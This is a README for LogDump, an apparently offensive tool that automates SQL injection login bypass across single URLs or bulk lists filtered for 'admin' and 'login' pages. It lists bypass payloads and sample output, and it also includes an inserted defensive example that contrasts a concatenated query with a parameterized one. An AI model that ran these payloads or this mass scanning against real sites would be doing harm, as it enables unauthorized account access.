LogDump is an automated SQL injection testing tool designed to test login pages for vulnerabilities. It sends injection payloads into the username and password fields to check for potential security flaws. The tool supports both single URL testing and testing multiple URLs from a file, with logging, retry mechanisms, and multi-threading for improved performance.
- Automated SQL Injection Testing: Test login pages with a variety of payloads to check for vulnerabilities.
- Single URL Testing: Test one URL at a time.
- Multiple URL Testing: Test multiple URLs from a file, with optional URL filtering based on keywords.
- Logging: Logs results of successful and failed injection attempts into separate log files.
- Exponential Backoff Retry: Automatically retries failed requests with an increasing delay.
- Multi-threading: Performs concurrent tests on multiple URLs and payloads for faster results.
- Customizable Fields: Allows customization of the username and password field names.
- Clone the repository: `git clone https://github.com/HackfutSec/LogDump.git`
- Navigate to the project directory: `cd LogDump`
- Install the required dependencies: `pip install -r requirements.txt`
If you don't have a `requirements.txt`, you can install the required libraries manually: `pip install requests`
To test a single login URL, run the program and provide the URL when prompted:
python logdump.py
You will be asked to enter:
- Username field name (default: `username`)
- Password field name (default: `password`)
- URL to test
The program will attempt to bypass the login using a series of payloads and log the results.
To test multiple URLs, the program will ask for the path to a file containing the URLs you want to test.
- URLs will be filtered based on keywords you provide (optional).
- The results will be logged and saved in the `results.txt` file.
python logdump.py
When prompted, enter:
- File path containing URLs to test.
- Keywords to filter URLs (optional).
- `success_injections.log`: Logs successful injection attempts.
- `error_injections.log`: Logs errors or failed attempts.
- `test_injections.log`: General logs, including retries and requests.
The results of successful logins are also saved in a text file (`results.txt`).
You can add custom payloads by editing the `payloads.json` file. This file should contain a list of payload strings, such as:
[
"' OR 1=1 --",
"' OR 'a'='a",
"' OR 1=1#"
]
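Seen from the defending side, the payloads listed above only succeed against a login query assembled by string concatenation. The following added example (not part of LogDump; the `users` table, the credentials and the function names are constructed for illustration) runs the three sample payloads against such a query and against a parameterized one, using in-memory SQLite:

```python
import sqlite3

# The three sample payloads shown in the payloads.json snippet above.
PAYLOADS = ["' OR 1=1 --", "' OR 'a'='a", "' OR 1=1#"]

def make_db():
    """Constructed in-memory table; plaintext password only to keep the demo
    short (a real table stores a salted password hash)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    return db

def login_vulnerable(db, username, password):
    """Weak form: user input is pasted into the SQL text itself."""
    sql = ("SELECT 1 FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        # The input broke the statement's syntax: no login, but proof that
        # it reached the SQL parser (e.g. '#' is a MySQL comment, not SQLite).
        return False

def login_parameterized(db, username, password):
    """Hardened form: placeholders keep input as data, never as SQL."""
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

def audit(login):
    """Send each payload as both username and password, as the page
    describes; return {payload: logged_in}."""
    db = make_db()
    return {p: login(db, p, p) for p in PAYLOADS}

if __name__ == "__main__":
    for name, fn in [("vulnerable", login_vulnerable),
                     ("parameterized", login_parameterized)]:
        for payload, ok in audit(fn).items():
            print(f"{name:14} {payload!r:16} bypass={ok}")
```

The `#` payload fails here only because SQLite does not treat `#` as a comment; the parameterized query rejects all three payloads regardless of the database behind it.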
You can customize the program by modifying the following parameters:
- Username field name and Password field name: Set default field names for the login form (default: `username`, `password`).
- Payload file: The default payload file is `payloads.json`. You can replace or modify it to suit your needs.
$ python logdump.py
Enter the URL to test (e.g., http://example.com/login.php): http://example.com/login.php
Enter the username field name (default 'username'):
Enter the password field name (default 'password'):
Testing with payload: ' OR 1=1 --
Testing with payload: ' OR 'a'='a
Login found with payload: ' OR 1=1 -- on URL http://example.com/login.php
Login found: http://example.com/login.php with payload: ' OR 1=1 --
$ python logdump.py
Enter the path to the file containing the URLs to test: urls.txt
Enter the keywords to filter URLs (separated by commas): admin,login
- Success logs: All successful injection attempts are logged in `success_injections.log`.
- Error logs: Errors, such as network issues or invalid responses, are logged in `error_injections.log`.
- General logs: General information, including retries, are stored in `test_injections.log`.
- `requests`: A simple HTTP library for making requests.
- `concurrent.futures`: For multi-threading to run tests concurrently.
Contributions are welcome! Feel free to fork the repository, open issues, and submit pull requests.
- Fork this repository.
- Create a new branch (`git checkout -b feature-name`).
- Make your changes.
- Commit your changes (`git commit -am 'Add new feature'`).
- Push to the branch (`git push origin feature-name`).
- Create a pull request.
This project is licensed under the MIT License - see the LICENSE file for details.